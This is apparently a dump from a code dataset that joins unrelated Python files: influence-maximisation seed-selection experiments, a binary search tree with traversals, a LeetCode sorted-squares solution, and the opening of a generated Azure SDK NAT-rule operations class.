                if not os.path.isdir(seed_data_path):
                    os.mkdir(seed_data_path)
                seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
                if not os.path.isdir(seed_data_path0):
                    os.mkdir(seed_data_path0)
                seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
                for sd in seed_data:
                    seed_data_file.write(sd)
                seed_data_file.close()
        # Backfill any budget level without a result from the previous one.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_hd(self):
        """
        High-degree heuristic: greedily take the highest-degree (product,
        node) pairs from a max-heap until the budget is spent.  No profit
        estimation is done during selection.  Uses the same budget-snapshot
        resumption scheme as model_dag.
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        sshd_model = SeedSelectionHD(graph_dict, product_list)
        ss_start_time = time.time()
        bud_iteration = self.budget_iteration.copy()
        now_b_iter = bud_iteration.pop(0)
        now_budget = 0.0
        seed_set = [set() for _ in range(num_product)]
        wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
        degree_heap = sshd_model.generateDegreeHeap()
        ss_acc_time = round(time.time() - ss_start_time, 4)
        temp_sequence = [[ss_acc_time, now_budget, seed_set, degree_heap]]
        temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
        while temp_sequence:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            [ss_acc_time, now_budget, seed_set, degree_heap] = temp_sequence.pop()
            seed_data = temp_seed_data.pop()
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            degree_heap_c = []
            while now_budget < total_budget and degree_heap:
                mep_item = heap.heappop_max(degree_heap)
                mep_deg, mep_k_prod, mep_i_node = mep_item
                sc = seed_cost_dict[mep_i_node]
                # Snapshot the remaining heap and the current state just
                # before this budget level would be exceeded, so the next
                # (larger) budget resumes instead of restarting.
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    degree_heap_c = copy.deepcopy(degree_heap)
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
                    now_b_iter = bud_iteration.pop(0)
                    temp_sequence.append([ss_time, now_budget, copy.deepcopy(seed_set), degree_heap_c])
                    temp_seed_data.append(seed_data.copy())
                if round(now_budget + sc, 4) > total_budget:
                    continue
                seed_set[mep_k_prod].add(mep_i_node)
                now_budget = round(now_budget + sc, 4)
                seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
                                 str(now_budget) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = seed_data
            # Persist the per-seed log for each relevant wallet distribution.
            for wd in wd_seq:
                seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
                if not os.path.isdir(seed_data_path):
                    os.mkdir(seed_data_path)
                seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
                if not os.path.isdir(seed_data_path0):
                    os.mkdir(seed_data_path0)
                seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
                for sd in seed_data:
                    seed_data_file.write(sd)
                seed_data_file.close()
        # Backfill any budget level without a result from the previous one.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_r(self):
        """
        Random baseline: shuffle all (product, node) pairs once and take
        them in that order until the budget is spent.  Uses the same
        budget-snapshot resumption scheme as model_dag, so all budget
        levels share one random order.
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_start_time = time.time()
        bud_iteration = self.budget_iteration.copy()
        now_b_iter = bud_iteration.pop(0)
        now_budget = 0.0
        seed_set = [set() for _ in range(num_product)]
        wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
        # Every (product, node) candidate pair in one shuffled list.
        random_node_list = [(k, i) for i in graph_dict for k in range(num_product)]
        random.shuffle(random_node_list)
        ss_acc_time = round(time.time() - ss_start_time, 4)
        temp_sequence = [[ss_acc_time, now_budget, seed_set, random_node_list]]
        temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
        while temp_sequence:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            [ss_acc_time, now_budget, seed_set, random_node_list] = temp_sequence.pop()
            seed_data = temp_seed_data.pop()
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            random_node_list_c = []
            while now_budget < total_budget and random_node_list:
                mep_item = random_node_list.pop(0)
                mep_k_prod, mep_i_node = mep_item
                sc = seed_cost_dict[mep_i_node]
                # Snapshot the remaining candidates and state just before
                # the budget would be exceeded, for the next budget level.
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    random_node_list_c = copy.deepcopy(random_node_list)
                if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
                    ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
                    now_b_iter = bud_iteration.pop(0)
                    temp_sequence.append([ss_time, now_budget, copy.deepcopy(seed_set), random_node_list_c])
                    temp_seed_data.append(seed_data.copy())
                if round(now_budget + sc, 4) > total_budget:
                    continue
                seed_set[mep_k_prod].add(mep_i_node)
                now_budget = round(now_budget + sc, 4)
                seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
                                 str(now_budget) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = seed_data
            # Persist the per-seed log for each relevant wallet distribution.
            for wd in wd_seq:
                seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
                if not os.path.isdir(seed_data_path):
                    os.mkdir(seed_data_path)
                seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
                if not os.path.isdir(seed_data_path0):
                    os.mkdir(seed_data_path0)
                seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
                for sd in seed_data:
                    seed_data_file.write(sd)
                seed_data_file.close()
        # Backfill any budget level without a result from the previous one.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_pmis(self):
        """
        PMIS seed selection: run a CELF greedy that records every prefix of
        the solution (s_matrix) with its cost (c_matrix), then let
        solveMCPK pick the best combination of prefixes under the budget
        (a multiple-choice knapsack over products).
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        # NG model (ratio flag hard-coded True) supplies profit evaluation.
        ssng_model = SeedSelectionNG(graph_dict, seed_cost_dict, product_list, epw_list, True)
        sspmis_model = SeedSelectionPMIS(graph_dict, seed_cost_dict, product_list, epw_list)
        ss_start_time = time.time()
        # The heap is built once and deep-copied for every budget level.
        celf_heap_o = sspmis_model.generateCelfHeap()
        ss_acc_time = round(time.time() - ss_start_time, 4)
        for now_b_iter in self.budget_iteration:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            celf_heap = copy.deepcopy(celf_heap_o)
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            # -- initialization for each sample --
            now_budget, now_profit = 0.0, 0.0
            seed_set = [set() for _ in range(num_product)]
            # s_matrix[j] is the seed set after j acceptances; c_matrix[j]
            # is its total cost (index 0 = empty set / zero cost).
            s_matrix, c_matrix = [[set() for _ in range(num_product)]], [0.0]
            while now_budget < total_budget and celf_heap:
                mep_item = heap.heappop_max(celf_heap)
                mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
                sc = seed_cost_dict[mep_i_node]
                seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
                if round(now_budget + sc, 4) > total_budget:
                    continue
                # CELF lazy evaluation: cached gain is valid only when the
                # flag matches the current seed count.
                if mep_flag == seed_set_length:
                    seed_set[mep_k_prod].add(mep_i_node)
                    now_budget = round(now_budget + sc, 4)
                    now_profit = ssng_model.getSeedSetProfit(seed_set)
                    s_matrix.append(copy.deepcopy(seed_set))
                    c_matrix.append(now_budget)
                else:
                    seed_set_t = copy.deepcopy(seed_set)
                    seed_set_t[mep_k_prod].add(mep_i_node)
                    ep_t = ssng_model.getSeedSetProfit(seed_set_t)
                    mg_t = round(ep_t - now_profit, 4)
                    flag_t = seed_set_length
                    if mg_t > 0:
                        celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
                        heap.heappush_max(celf_heap, celf_item_t)
            # NOTE(review): [s_matrix] * num_product makes every product row
            # alias the SAME matrix object — fine only if solveMCPK treats
            # its inputs as read-only; confirm.
            seed_set = sspmis_model.solveMCPK(total_budget, [s_matrix] * num_product, [c_matrix] * num_product)
            now_budget = sum(seed_cost_dict[i] for k in range(num_product) for i in seed_set[k])
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            # No per-seed log is produced here; the seed set itself fills
            # the sequence slot so the backfill loop below still works.
            seed_data_sequence[now_bi_index] = seed_set
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
    def model_bcs(self):
        """
        BCS seed selection: run two CELF greedy passes (one cost-ratio
        "handbill" pass, one absolute-gain "billboard" pass — the ratio
        branch is the one taken while celf_heap_list is non-empty), then
        improve the billboard solution by simulated-annealing swaps that
        replace billboard seeds with handbill seeds.
        """
        ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
        seed_cost_dict = ini.constructSeedCostDict()
        graph_dict = ini.constructGraphDict()
        product_list, epw_list = ini.constructProductList()
        num_product = len(product_list)
        total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
        # One slot per budget level; -1 marks "no result recorded yet".
        seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
        seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
        ssbcs_model = SeedSelectionBCS(graph_dict, seed_cost_dict, product_list, epw_list)
        ss_start_time = time.time()
        # A list of heaps, deep-copied per budget level and popped in turn.
        celf_heap_list_o = ssbcs_model.generateCelfHeap()
        ss_acc_time = round(time.time() - ss_start_time, 4)
        for now_b_iter in self.budget_iteration:
            ss_start_time = time.time()
            now_bi_index = self.budget_iteration.index(now_b_iter)
            total_budget = safe_div(total_cost, 2 ** now_b_iter)
            celf_heap_list = copy.deepcopy(celf_heap_list_o)
            print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
                  '\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
            seed_set_list = []
            while celf_heap_list:
                celf_heap = celf_heap_list.pop()
                now_budget, now_profit = 0.0, 0.0
                seed_set = [set() for _ in range(num_product)]
                while now_budget < total_budget and celf_heap:
                    mep_item = heap.heappop_max(celf_heap)
                    mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
                    sc = seed_cost_dict[mep_i_node]
                    seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
                    if round(now_budget + sc, 4) > total_budget:
                        continue
                    if mep_flag == seed_set_length:
                        seed_set[mep_k_prod].add(mep_i_node)
                        now_budget = round(now_budget + sc, 4)
                        # While more heaps remain, gains are per-cost ratios;
                        # the final heap uses absolute gains.
                        now_profit = round(now_profit + mep_mg * (sc if len(celf_heap_list) else 1.0), 4)
                    else:
                        seed_set_t = copy.deepcopy(seed_set)
                        seed_set_t[mep_k_prod].add(mep_i_node)
                        ep_t = ssbcs_model.getSeedSetProfit(seed_set_t)
                        mg_t = round(ep_t - now_profit, 4)
                        if len(celf_heap_list):
                            mg_t = safe_div(mg_t, sc)
                        flag_t = seed_set_length
                        if mg_t > 0:
                            celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
                            heap.heappush_max(celf_heap, celf_item_t)
                # insert(0): the last pass solved ends up at index 0
                # ("billboard"), the first pass at index 1 ("handbill").
                seed_set_list.insert(0, seed_set)
            final_seed_set = copy.deepcopy(seed_set_list[0])
            final_bud = sum(seed_cost_dict[i] for k in range(num_product) for i in final_seed_set[k])
            final_ep = ssbcs_model.getSeedSetProfit(seed_set_list[0])
            for k in range(num_product):
                Handbill_counter = 0
                # Annealing temperature: starts at 1e6 and cools by 1000 per
                # attempted billboard-seed replacement.
                AnnealingScheduleT, detT = 1000000, 1000
                for s in seed_set_list[0][k]:
                    # -- first level: replace billboard seed by handbill seed --
                    # NOTE(review): assumes s is still in final_seed_set_t[k];
                    # if an earlier accepted swap removed/readded it this
                    # raises KeyError — confirm the invariant.
                    final_seed_set_t = copy.deepcopy(final_seed_set)
                    final_seed_set_t[k].remove(s)
                    final_bud_t = final_bud - seed_cost_dict[s]
                    # (the genexp's k shadows the loop k only inside the set.)
                    Handbill_seed_set = set((k, i) for k in range(num_product) for i in seed_set_list[1][k] if i not in final_seed_set_t[k])
                    if Handbill_seed_set:
                        min_Handbill_cost = min(seed_cost_dict[Handbill_item[1]] for Handbill_item in Handbill_seed_set)
                        # Greedily pack handbill seeds into the freed budget.
                        while total_budget - final_bud_t >= min_Handbill_cost and Handbill_seed_set:
                            k_prod, i_node = Handbill_seed_set.pop()
                            if seed_cost_dict[i_node] <= total_budget - final_bud_t:
                                final_seed_set_t[k_prod].add(i_node)
                                final_bud_t += seed_cost_dict[i_node]
                                Handbill_counter += 1
                        final_ep_t = ssbcs_model.getSeedSetProfit(final_seed_set_t)
                        final_mg_t = final_ep_t - final_ep
                        # -- second level: replace handbill seed by handbill seed --
                        # Metropolis acceptance: always accept improvements,
                        # accept regressions with prob exp(gain / T).
                        if final_mg_t >= 0 or math.exp(safe_div(final_mg_t, AnnealingScheduleT)) > random.random():
                            final_seed_set = final_seed_set_t
                            final_bud = final_bud_t
                            final_ep = final_ep_t
                        for q in range(min(Handbill_counter, 10)):
                            final_seed_set_t = copy.deepcopy(final_seed_set)
                            final_Handbill_seed_set = set((k, i) for k in range(num_product) for i in final_seed_set_t[k] if i in seed_set_list[1][k])
                            if final_Handbill_seed_set:
                                # Swap out one (arbitrary) handbill seed and
                                # repack the freed budget with others.
                                k_prod, i_node = final_Handbill_seed_set.pop()
                                final_seed_set_t[k_prod].remove(i_node)
                                final_bud_t = final_bud - seed_cost_dict[i_node]
                                Handbill_seed_set = set((k, i) for k in range(num_product) for i in seed_set_list[1][k] if i not in final_seed_set_t[k])
                                min_Handbill_cost = min(seed_cost_dict[Handbill_item[1]] for Handbill_item in Handbill_seed_set)
                                while total_budget - final_bud_t >= min_Handbill_cost and Handbill_seed_set:
                                    k_prod, i_node = Handbill_seed_set.pop()
                                    if seed_cost_dict[i_node] <= total_budget - final_bud_t:
                                        final_seed_set_t[k_prod].add(i_node)
                                        final_bud_t += seed_cost_dict[i_node]
                                final_ep_t = ssbcs_model.getSeedSetProfit(final_seed_set_t)
                                final_mg_t = final_ep_t - final_ep
                                if final_mg_t >= 0 or math.exp(safe_div(final_mg_t, AnnealingScheduleT)) > random.random():
                                    final_seed_set = final_seed_set_t
                                    final_bud = final_bud_t
                                    final_ep = final_ep_t
                        AnnealingScheduleT -= detT
            seed_set = copy.deepcopy(final_seed_set)
            ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
            print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(final_bud) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
            seed_set_sequence[now_bi_index] = seed_set
            ss_time_sequence[now_bi_index] = ss_time
            seed_data_sequence[now_bi_index] = final_seed_set
        # Backfill any budget level without a result from the previous one.
        while -1 in seed_data_sequence:
            no_data_index = seed_data_sequence.index(-1)
            seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
            ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
            seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
        eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
        for bi in self.budget_iteration:
            now_bi_index = self.budget_iteration.index(bi)
            if wallet_distribution_type_dict[self.wallet_key]:
                eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
            else:
                for wd in self.wd_seq:
                    eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
"[email protected]"
] | |
class Node:
    """A single binary-search-tree node: a payload plus two child links."""

    def __init__(self, value):
        self.data = value   # payload stored at this node
        self.left = None    # left subtree (values smaller than data)
        self.right = None   # right subtree (values larger than data)
class Tree:
    """Binary search tree of Node objects.

    Provides insert/search/delete plus the three depth-first traversals,
    which print node values to stdout (matching the original interface).
    """

    def createNode(self, data):
        """Create and return a new detached Node holding *data*."""
        return Node(data)

    def insert(self, node, data):
        """Insert *data* into the subtree rooted at *node*.

        Returns the (possibly new) subtree root.  Duplicate keys are not
        allowed: an equal value falls through both branches unchanged.
        """
        # Empty subtree: the new node becomes its root.
        if node is None:
            return self.createNode(data)
        if data < node.data:
            node.left = self.insert(node.left, data)
        elif data > node.data:
            node.right = self.insert(node.right, data)
        return node

    def search(self, node, data):
        """Return the node holding *data* within *node*'s subtree, or None."""
        if node is None or node.data == data:
            return node
        if node.data < data:
            return self.search(node.right, data)
        return self.search(node.left, data)

    def deleteNode(self, node, data):
        """Delete *data* from the subtree rooted at *node*; return the new root.

        Handles leaves, single-child nodes, and (new) two-child nodes,
        which are replaced by their in-order successor.
        """
        if node is None:
            return None
        # Standard BST descent to locate the key.
        if data < node.data:
            node.left = self.deleteNode(node.left, data)
        elif data > node.data:
            node.right = self.deleteNode(node.right, data)
        else:
            # Found the node to remove.
            # BUGFIX: the original leaf branch executed `del node` and then
            # kept dereferencing `node`, raising UnboundLocalError.
            if node.left is None:
                return node.right          # also covers the leaf case
            if node.right is None:
                return node.left
            # Two children: copy in the in-order successor (smallest key of
            # the right subtree), then delete that successor below.
            succ = node.right
            while succ.left is not None:
                succ = succ.left
            node.data = succ.data
            node.right = self.deleteNode(node.right, succ.data)
        return node

    def traverseInorder(self, root):
        """Print the subtree in sorted (left, root, right) order."""
        if root is not None:
            self.traverseInorder(root.left)
            print(root.data)
            self.traverseInorder(root.right)

    def traversePreorder(self, root):
        """Print the subtree in (root, left, right) order."""
        if root is not None:
            print(root.data)
            self.traversePreorder(root.left)
            self.traversePreorder(root.right)

    def traversePostorder(self, root):
        """Print the subtree in (left, right, root) order.

        BUGFIX: the original recursed via traversePreorder, so the output
        was not a post-order traversal.
        """
        if root is not None:
            self.traversePostorder(root.left)
            self.traversePostorder(root.right)
            print(root.data)
def main():
    """Demo driver: build a small BST and print all three traversals."""
    tree = Tree()
    root = tree.insert(None, 10)
    print(root)
    for value in (20, 30, 40, 70, 60, 80):
        tree.insert(root, value)
    print("Traverse Inorder")
    tree.traverseInorder(root)
    print("Traverse Preorder")
    tree.traversePreorder(root)
    print("Traverse Postorder")
    tree.traversePostorder(root)


if __name__ == "__main__":
    main()
| [
"[email protected]"
] | |
c9d62cd28eb6a98c113b079864bf0553c983be35 | 284f4f56aed56573eb5516aa67c99bf41e595522 | /Leetcode/Arrays/p3574.py | 4261a42c73d1469fdff5a35d33f807e57238da87 | [] | no_license | rohangoli/PythonAdvanced | 537a05eff9ec305a6ec32fa2d0962a64976cd097 | 6448a5f0d82c7e951b5e476638e15a3c34966cd9 | refs/heads/develop | 2023-07-20T04:33:50.764104 | 2023-07-14T04:04:18 | 2023-07-14T04:04:18 | 126,811,520 | 0 | 0 | null | 2022-06-10T23:07:10 | 2018-03-26T10:20:16 | Jupyter Notebook | UTF-8 | Python | false | false | 514 | py | ## Squares of a Sorted Array
# Example 1:
# Input: nums = [-4,-1,0,3,10]
# Output: [0,1,9,16,100]
# Explanation: After squaring, the array becomes [16,1,0,9,100].
# After sorting, it becomes [0,1,9,16,100].
# Example 2:
# Input: nums = [-7,-3,2,3,11]
# Output: [4,9,9,49,121]
class Solution:
    def sortedSquares(self, nums: List[int]) -> List[int]:
        """Square every element of the sorted list *nums* and return it
        sorted in non-decreasing order.

        The input is sorted, so one sort after squaring restores order.
        Mutates the caller's list in place (as the original did) via slice
        assignment, and handles the empty list naturally.
        """
        # Idiomatic replacement for the original manual index/while loop.
        nums[:] = sorted(v * v for v in nums)
        return nums
"[email protected]"
] | |
cf12b9fec72682fc2aa7ad9307da65aab512a315 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2021_02_01/operations/_virtual_network_gateway_nat_rules_operations.py | 8cc37a0f84e06af9a668517eea78cd7432103909 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 22,954 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualNetworkGatewayNatRulesOperations(object):
    """VirtualNetworkGatewayNatRulesOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2021_02_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    # NOTE: AutoRest-generated code; edits here are normally lost on regeneration.
    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def get(
        self,
        resource_group_name,  # type: str
        virtual_network_gateway_name,  # type: str
        nat_rule_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.VirtualNetworkGatewayNatRule"
        """Retrieves the details of a nat rule.

        :param resource_group_name: The resource group name of the Virtual Network Gateway.
        :type resource_group_name: str
        :param virtual_network_gateway_name: The name of the gateway.
        :type virtual_network_gateway_name: str
        :param nat_rule_name: The name of the nat rule.
        :type nat_rule_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualNetworkGatewayNatRule, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
